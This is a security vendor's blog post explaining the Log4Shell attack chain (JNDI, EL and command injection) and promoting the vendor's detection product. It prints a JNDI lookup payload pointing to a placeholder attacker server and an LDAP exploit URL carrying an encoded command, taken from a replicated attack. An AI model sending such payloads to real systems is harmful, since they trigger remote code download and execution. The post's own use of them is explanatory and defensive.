In today's rapidly evolving cyber threat landscape, organizations face increasingly sophisticated attacks targeting their applications. Understanding these threats and the technologies designed to combat them is crucial. This article delves into the mechanics of a common application attack, using the well-known Log4Shell vulnerability as an example. Using a real-world exploit example, we explore how this vulnerability can lead to initial exploitation as well as exploit chaining, and we demonstrate how Contrast Security's Application Detection and Response (ADR) technology effectively safeguards against such zero-day threats.
The article also highlights the business benefits of ADR, including reduced risk, lower costs and improved compliance. By understanding the advantages of ADR and its real-world impact, organizations can make informed decisions to enhance their Application Security (AppSec) posture and stay ahead of emerging threats.
Before we dive into the details of ADR, it's crucial to understand how it addresses a significant gap in many organizations' security strategies: the lack of robust application-level threat detection.
Many organizations rely on WAFs as their primary defense against application-level threats. However, this approach has several critical limitations:
Technical Note: A WAF is a security tool that monitors, filters and blocks HTTP traffic to and from a web application. It operates at the network level and is intended to help protect web applications from various attacks, such as Cross-Site Scripting (XSS) and SQL injection.
Technical Note: WAF bypasses are techniques attackers use to render WAF security controls ineffective. These include methods to sneak malicious payloads past the WAF’s signature-based protections, or outright avoidance of the WAF entrypoint to the application. It is important to have a defense-in-depth strategy when it comes to AppSec and not rely on a single control to ensure security of the application layer.
EDR solutions focus on monitoring and protecting individual endpoints (like computers and mobile devices) within an organization. While crucial for overall security, EDR has its own set of limitations when it comes to AppSec:
Technical note: EDR is a cybersecurity technology that continuously monitors and responds to threats on endpoint devices such as computers, laptops and mobile devices. EDR solutions collect and analyze data from endpoints to enable security operations teams to detect, investigate and mitigate suspicious activities and potential security breaches. They typically provide real-time visibility, threat detection and automated response capabilities, focusing on endpoint-level activities rather than application-specific behaviors.
ADR technology addresses these limitations by working within the application itself. This approach offers several key advantages:
By implementing ADR, organizations can fill this critical gap in their security posture, gaining the ability to detect and respond to sophisticated application-level threats that existing solutions might miss.
Technical Note: ADR is a security approach that focuses on detecting and responding to threats at the application level. Unlike other AppSec measures that operate at the network level, ADR works within the application itself, providing deeper visibility into application behavior and more accurate threat detection.
Technical Note: A zero-day vulnerability is a software security flaw that is unknown to the software vendor and has not yet been patched. These vulnerabilities can be exploited by attackers before the vendor becomes aware and hurries to fix them.
To illustrate the complexity and severity of modern application attacks, let's examine an attack against the infamous Log4Shell vulnerability (CVE-2021-44228) that sent shockwaves through the cybersecurity world in late 2021. This attack is a prime example of attack chaining, leveraging JNDI Injection, Expression Language (EL) Injection, and Command Injection.
Technical Note: The CVE program catalogs publicly disclosed computer security flaws and is maintained by MITRE. Each CVE entry has a unique identifier, making it easier for IT professionals to share information about vulnerabilities across different security tools and services.
The Log4Shell vulnerability affects Log4j, a ubiquitous Java logging framework. The attack begins when a malicious actor sends a specially crafted request to a vulnerable application. This request contains a Java Naming and Directory Interface (JNDI) lookup string in a format like this:
${jndi:ldap://attacker-controlled-server.com/payload}
Technical Note: JNDI (Java Naming and Directory Interface) is a Java API that provides naming and directory functionality to Java applications. It allows Java applications to discover and look up data and objects via a name, which can be exploited in certain vulnerabilities like Log4Shell. In this context, it's being abused to initiate a connection to a malicious server.
When the vulnerable Log4j version processes this string, it interprets the ${jndi:...} part as an expression to be evaluated. This evaluation causes the application to perform a JNDI lookup, reaching out to the attacker-controlled Lightweight Directory Access Protocol (LDAP) server specified in the string.
Technical Note: Log4j is a popular Java-based logging framework developed by Apache. It's widely used in Java applications for logging various types of data and events.
The attacker's LDAP server responds with an Expression Language (EL) injection payload. Due to the nature of JNDI and how Log4j processes the response, this payload is treated as an EL expression to be evaluated.
The EL expression typically contains malicious code designed to exploit the EL interpreter. This could include commands to download and execute additional malware, exfiltrate data or establish a backdoor in the system.
Technical Note: Expression Language (EL) is a scripting language that allows access to application data. EL injection occurs when an attacker can manipulate or inject malicious EL expressions, potentially leading to code execution. EL injection vulnerabilities are a recurring theme among zero-day vulnerabilities, either directly or indirectly through chained attacks as in this example.
As the EL interpreter evaluates the injected expression, it executes the malicious code within the context of the vulnerable application. This gives the attacker a foothold in the system, often with the same privileges as the application itself.
What makes the Log4Shell vulnerability particularly severe is the widespread usage of the Log4j library and how easy it was to exploit the vulnerability, and carries the following concerns:
This anatomy of the Log4Shell attack demonstrates why application layer attacks are so potent and why protection mechanisms like ADR are crucial for detecting and preventing such sophisticated attacks.
With initial access established, attackers can leverage this position to use additional tactics to accomplish other objectives, such as:
The Contrast Security Runtime Security Platform employs innovative ADR technology to detect and prevent attacks like Log4Shell at multiple stages. Before we dive into the specifics of the Log4Shell protections, let’s understand the architecture that makes this possible.
Contrast ADR uses agent-based architecture, integrating directly with the application runtime:
This architecture allows Contrast Runtime Security to offer deep visibility and precise protection at multiple stages of an attack. Let's examine how this plays out in practice:
Contrast Runtime Security identifies the malicious JNDI lookup attempt by:
Contrast Runtime Security identifies EL injection attempts and protects against them by using:
In the unlikely event that malicious code is loaded, the Contrast Runtime Security Platform utilizes:
To better understand how Contrast’s ADR technology works in practice, let's examine a series of screenshots from a replicated Log4Shell attack detection event.
Note: All behavioral rules are set to MONITOR mode, not BLOCK mode, for this example to illustrate attacker exploit chaining and the defense-in-depth detection capabilities of Contrast’s ADR. Normally, these rules would be set to BLOCK mode, catching and blocking the initial JNDI exploit, and preventing the subsequent events from occurring in the first place.
In the first screenshot, we see Contrast ADR identifying a JNDI injection attempt:
ldap://143.110.184.204:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCB…
This LDAP URL is characteristic of a Log4Shell exploit attempt, where the attacker tries to initiate a JNDI lookup to a malicious server.
The second screenshot provides a detailed stack trace of the attack:
Technical Note: For those not familiar with the series of method calls shown in the screenshot above, this is a stack trace. This stack trace is a snapshot of code execution that the application was in the middle of when Contrast's ADR detected the attack. In stack traces, the method calling order is from bottom-to-top, not top-to-bottom (as we normally read), which can sometimes be confusing for non-developers. Just think of this as stacking plates on top of each other, with the most recently stacked plate going on top.
The third screenshot reveals the content of the malicious payload downloaded from the attacker-controlled server:
The fourth screenshot shows code-level details with the invocation of the EL processor:
The fifth screenshot show the invocation of the command embedded within the JavaScript payload:
The final screenshot shows the invocation of the JavaScript code and forking of the process using Runtime.exec which invokes ProcessBuilder.start.
Technical Note: The Nashorn scripting engine was removed from Java in version 15, which would make this specific attack payload ineffective if using a newer version of Java. However, attackers can still use other techniques to exploit this vulnerability in newer versions of Java.
This detailed breakdown demonstrates Contrast ADR’s ability to:
This level of insight is crucial for both preventing attacks and understanding new threat patterns.
When Contrast ADR detects a potential Log4Shell exploitation attempt, it triggers a comprehensive response that aligns with the NIST Cybersecurity Framework. Here's how an ADR system would typically respond:
Throughout this process, the ADR system:
This comprehensive ADR approach ensures a rapid, coordinated response to Log4Shell exploitation attempts, leveraging automation and integration with the broader security ecosystem to minimize risk and support quick recovery.
Technical Note: SIEM (Security Information and Event Management) is a system that collects and analyzes log data from various sources across an organization's IT infrastructure. It helps in real-time analysis of security alerts generated by applications and network hardware. Some SIEM examples include Splunk, QRadar and Microsoft Sentinel.
Technical Note: XDR (Extended Detection and Response) is a holistic security approach that collects and automatically correlates data across multiple security layers — email, endpoints, servers, cloud workloads and networks. It uses analytics to detect threats and automatically respond to them, providing a more comprehensive and efficient way to detect, investigate and respond to cybersecurity incidents across the entire IT ecosystem.
The detailed attack chain analysis provided by Contrast ADR offers several advantages:
Contrast's ADR solution offers several advantages over other security tools like web application firewalls (WAFs) and EDR products:
Implementing Contrast’s ADR technology translates into tangible business benefits:
Note: PCI DSS (Payment Card Industry Data Security Standard) is a set of security standards designed to ensure that all companies that accept, process, store or transmit credit card information maintain a secure environment.
Note: GDPR (General Data Protection Regulation) is a regulation in EU law on data protection and privacy in the European Union and the European Economic Area. It also addresses the transfer of personal data outside the EU and EEA areas.
When the Log4Shell vulnerability was disclosed, organizations worldwide scrambled to patch their systems and mitigate the risk. However, Contrast Security customers using ADR were already defended against this critical vulnerability.
Contrast ADR’s multi-layered approach to security meant that even before the vulnerability was publicly known, it could:
This proactive protection highlights the power of ADR technology in safeguarding applications against even the most sophisticated and previously unknown threats.
But Log4Shell is just one example. Other high-profile examples of zero-day protection offered by this technology include:
CVE Identifier |
Application or Component |
Vulnerability Type |
Netflix Genie |
Path Traversal |
|
Atlassian Confluence |
Template Injection |
|
Spring/Kafka |
Unsafe Deserialization |
|
Spring (Spring4Shell) |
Malicious Data Binding |
|
Atlassian Confluence |
EL injection |
|
Apache Struts2 |
EL injection |
|
Python Salt |
Directory Traversal |
|
Apache Tomcat |
Unsafe Deserialization |
|
WebLogic |
Unsafe Deserialization |
|
Apache Struts2 |
EL injection |
|
Apache Struts2 |
EL injection |
|
Jenkins XStream |
Unsafe Deserialization |
The integration of Application Detection and Response (ADR) technology with existing Security Information and Event Management (SIEM) and Extended Detection and Response (XDR) systems creates a powerful synergy that enhances overall security operations. Here's how ADR can fit into and augments SIEM/XDR-driven workflows:
By integrating ADR into the SIEM/XDR ecosystem, organizations achieve more comprehensive threat detection, faster incident response, and more effective vulnerability management, significantly enhancing their overall security posture.
As cyber threats continue to evolve, network-based AppSec measures are no longer sufficient to protect critical applications and data. Contrast’s ADR technology offers a robust, intelligent, and proactive approach to AppSec.
By understanding the anatomy of modern attacks and leveraging cutting-edge ADR solutions, organizations can significantly enhance their security posture, minimize risk, and stay ahead of emerging threats. As a security decision-maker, investing in ADR technology is not just a security measure – it's a strategic imperative for safeguarding your organization's digital assets in today's threat landscape.
To learn more about how ADR technology can protect your organization:
By taking these steps, you'll be well on your way to strengthening your AppSec and staying ahead of evolving cyber threats.
Read more:
Jonathan Harper is a Principal Solutions Engineer at Contrast Security with over five years of experience in Application Security. He has supported large enterprises in implementing Application Security and host-based instrusion detection systems at scale. Previously, he held roles at Threat Stack, Veracode and Micron Technology. Jonathan holds a Bachelor's degree in Electrical and Electronics Engineering from the University of Portland.
Get the latest content from Contrast directly to your mailbox. By subscribing, you will stay up to date with all the latest and greatest from Contrast.